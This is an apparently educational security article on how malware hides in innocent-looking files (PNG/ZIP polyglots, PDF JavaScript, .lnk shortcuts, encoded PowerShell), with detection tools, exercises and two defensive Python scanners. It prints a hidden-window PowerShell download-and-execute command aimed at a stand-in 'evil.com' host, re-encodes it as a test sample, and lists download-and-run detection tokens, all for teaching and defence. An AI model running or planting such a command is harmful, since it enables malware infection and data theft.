A common misconception about malware is that it has to have a frightening name (like "virus.exe"). In practice the file often has an innocent-looking name and extension, yet is still highly dangerous because of the code written into it.
Examples of these include:
1. A normal-looking PNG image
2. A PDF invoice
3. A Word document
4. A shortcut (.lnk) file
5. A spreadsheet
6. Even a simple text file or script
Depending on how it is done, this technique is called obfuscation, steganography, polyglot files, or file format abuse. The code is deliberately concealed so that antivirus misses it, users open the file without suspicion, and investigators have a hard time finding the real payload.
In 2025–2026 this style of hiding is extremely common in phishing, ClickFix scams, infostealers, ransomware droppers, and supply-chain attacks.
Main Ways Malicious Code Hides in Files
1. Steganography - data is hidden inside image, audio or video files, for example in the least significant bits of pixel values or audio samples, so the image still looks normal and the sound or video plays normally.
2. Polyglot files - one file whose bytes are valid as several file types at the same time. For example, a single file can be both a valid PNG and a valid ZIP: opened in an image viewer it displays as a picture, but opened with a zip utility it extracts the malware.
3. Embedded scripts in documents - scripts such as VBA macros (in Microsoft Word and Excel), JavaScript (in PDF documents), or HTML smuggling (in .eml files).
4. Abuse of .lnk shortcut files - a shortcut can carry a hidden command line that runs a PowerShell command or downloads malware as soon as the shortcut is double-clicked.
5. Obfuscated PowerShell and scriptlet files - long base64 strings in .lnk, .hta or .sct files that decode to malicious code when executed.
6. Metadata / alternate data streams (NTFS ADS) - malicious code can be stored in a file's metadata or in an NTFS alternate data stream; File Explorer shows only the main stream, so when you locate and open the file there you will not see the hidden malicious code.
Real-World Examples
Example 1: PNG Polyglot (ClickFix style) - the victim receives a WhatsApp message saying "Your invoice - open the photo to view" with a file named invoice.png.
1. It opens normally in a photo viewer, as intended.
2. But it is also a valid ZIP file: right-click → open with WinRAR → it extracts a malicious .exe or .ps1 file.
3. This real-world pattern has been used by phishing groups located in the Middle East.
Example 2: LNK Shortcut Hiding PowerShell - an email attachment named "Report Q4.lnk" is double-clicked.
1. Runs a PowerShell command with its window hidden.
2. Downloads the LummaC2 infostealer from the attacker's server.
3. Typical command found inside the LNK shortcut: powershell -w hidden -nop -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString('hxxps://evil[.]com/payload'))"
Example 3: PDF with Embedded JavaScript - a fake invoice PDF contains JavaScript that runs when the file is opened in a vulnerable PDF reader.
1. Drops malware or leads to a phishing web page.
2. Still works on older versions of Adobe Reader or in misconfigured browsers.
Example 4: Image Metadata Hiding a Script - a PNG file with an iTXt chunk containing malicious JavaScript can execute code when viewed in particular viewers or browsers (a very rare case, but one that has actually occurred).
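To make the PNG/ZIP polyglot of Example 1 and the oversized iTXt chunk of Example 4 concrete, here is an added Python example written for this article (not a tool from the original). It builds a clean 1x1 PNG and a PNG/ZIP polyglot in memory, then reports what a defender should look for: bytes after the IEND chunk, ZIP signatures in that trailer, and text chunks larger than a chosen threshold. The 512-byte threshold, the sample image and the archive contents are assumptions.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06")   # local file header, end-of-central-directory
BIG_TEXT = 512                                  # assumed: text chunks above this size get flagged

def chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, 4-byte type, data, CRC32 over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def analyse_png(data: bytes) -> dict:
    """Walk the chunk list; report oversized text chunks, bytes after IEND and ZIP magic in them."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    report = {"big_text_chunks": [], "trailing_bytes": 0, "zip_in_trailer": False}
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype in TEXT_CHUNKS and length > BIG_TEXT:
            report["big_text_chunks"].append((ctype.decode(), length))
        pos += 12 + length                      # length + type + data + CRC
        if ctype == b"IEND":                    # a clean file ends exactly here
            break
    trailer = data[pos:]
    report["trailing_bytes"] = len(trailer)
    report["zip_in_trailer"] = any(m in trailer for m in ZIP_MAGICS)
    return report

def zip_names(data: bytes) -> list:
    """What a zip utility would extract; zipfile skips the PNG bytes in front of the archive."""
    return zipfile.ZipFile(io.BytesIO(data)).namelist() if zipfile.is_zipfile(io.BytesIO(data)) else []

def build_samples() -> tuple:
    """Constructed samples: a clean 1x1 greyscale PNG, and a PNG/ZIP polyglot of the same image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)     # 1x1, 8-bit, greyscale
    idat = zlib.compress(b"\x00\x00")                       # filter byte + one pixel
    clean = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    itxt = b"Comment\x00\x00\x00\x00\x00" + b"A" * 2000     # keyword, flags, lang, tkey, text
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:                   # harmless placeholder archive
        zf.writestr("note.txt", "placeholder content, not a payload")
    polyglot = (PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"iTXt", itxt)
                + chunk(b"IDAT", idat) + chunk(b"IEND", b"") + buf.getvalue())
    return clean, polyglot
```

Running `analyse_png` and `zip_names` over both samples shows the clean image has nothing after IEND and no archive, while the polyglot reports a 2012-byte iTXt chunk, a trailer with ZIP signatures, and a file list a zip utility would happily extract.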
Practical Tools to Detect Hidden Code
1. ExifTool (free, excellent for metadata)
exiftool suspicious.png
Look for large iTXt/zTXt chunks or odd software tags.
2. zsteg (PNG steganography detector)
zsteg suspicious.png
Displays concealed strings or files in the LSB planes or palette.
3. binwalk (extracts embedded files)
binwalk -e suspicious.png
Extracts embedded ZIPs, scripts, or other payloads.
4. olevba / oletools (specifically for Office documents)
olevba invoice.docm
Displays concealed VBA macros.
5. Free LNK parser / LNK Explorer tools
Open the .lnk file → displays the concealed command line.
6. CyberChef (online/offline, free) - paste the base64 string from the file → "From Base64" → "Decode Text" → see the decoded PowerShell.
7. PEiD / Detect It Easy (DIE) - detects packers/crypters in executables hidden inside polyglots.
Quick Hands-On Exercises
Exercise 1 – Check Metadata: take any photo from your phone → run
exiftool yourphoto.jpg
Write down 3 pieces of information it reveals (date, device, location).
Exercise 2 – Clean a Photo
exiftool -all= yourphoto.jpg
Compare before and after to see how much personal data disappears.
Exercise 3 – Spot Suspicious Strings: download a .lnk file from a safe test source (or create one) → open it in Notepad → look for long PowerShell strings or http URLs.
Exercise 4 – Use CyberChef Online: go to https://gchq.github.io/CyberChef, paste any base64 string you find in a suspicious file → drag in the "From Base64" and "Decode Text" recipes → see what it reveals.
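The string hunt of Exercise 3 and the base64 decoding of Exercise 4 can be scripted. This added Python example (not part of the original article) constructs a shortcut-like byte blob carrying the Example 2 command line, with the defanged download cradle hidden as a UTF-16LE -EncodedCommand, then finds long base64 runs, decodes them and flags download-and-run tokens. The token list, the 40-character minimum run length and the sample bytes are assumptions.

```python
import base64
import re
from typing import Optional

# Runs of base64 text (40+ chars) of the kind found in .lnk, .hta and .sct droppers (assumed minimum).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# Tokens that usually mean "download and run" in a PowerShell command line (assumed list).
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "FromBase64String", "-w hidden", "-ep bypass", "http")

def decode_run(raw: bytes) -> Optional[str]:
    """Decode one base64 run; PowerShell -EncodedCommand payloads are UTF-16LE, scripts are UTF-8."""
    try:
        blob = base64.b64decode(raw, validate=True)
    except ValueError:                       # not really base64 (bad alphabet, length or padding)
        return None
    # UTF-16LE ASCII text has a null byte at every odd offset; use that to pick the decoding.
    enc = "utf-16-le" if blob[1::2].count(0) > len(blob) // 4 else "utf-8"
    try:
        return blob.decode(enc)
    except UnicodeDecodeError:
        return None

def scan(data: bytes) -> dict:
    """Flag suspicious tokens in the raw text and in every base64 run that decodes to text."""
    raw_text = data.decode("latin-1").lower()
    report = {"plain": [t for t in SUSPICIOUS if t.lower() in raw_text], "decoded": []}
    for m in B64_RUN.finditer(data):
        text = decode_run(m.group())
        if text:
            tokens = [t for t in SUSPICIOUS if t.lower() in text.lower()]
            if tokens:
                report["decoded"].append((text, tokens))
    return report

def build_sample() -> bytes:
    """Constructed stand-in for a shortcut: the shortcut header-size and CLSID prefix bytes, then
    the article's (defanged) Example 2 command with the cradle hidden as -EncodedCommand."""
    cmd = "IEX((New-Object Net.WebClient).DownloadString('hxxps://evil[.]com/payload'))"
    encoded = base64.b64encode(cmd.encode("utf-16-le"))
    return (b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 16
            + b"powershell.exe -w hidden -nop -ep bypass -EncodedCommand " + encoded + b"\x00\x00")

if __name__ == "__main__":
    for text, tokens in scan(build_sample())["decoded"]:
        print(tokens, "->", text)
```

Run against a real shortcut's bytes (`scan(open("Report Q4.lnk", "rb").read())`) the same function reports the plain-text switches and the decoded command side by side.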
Key Takeaways
Malware authors often hide harmful code in ordinary-looking files (i.e. pictures, PDFs, Windows shortcuts, Office documents) because users open them with little or no suspicion, and because many scanners check such files and completely miss the hidden code.
Simple methods of protecting yourself work best:
1. Don't open any unexpected files - even if it is just a picture
2. Turn off auto-open for Office macros
3. Restrict install permissions for unknown programs
4. Use antivirus that can detect script execution and malicious behaviour
5. If you are curious, examine files safely with ExifTool, binwalk or CyberChef - do not execute the file
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067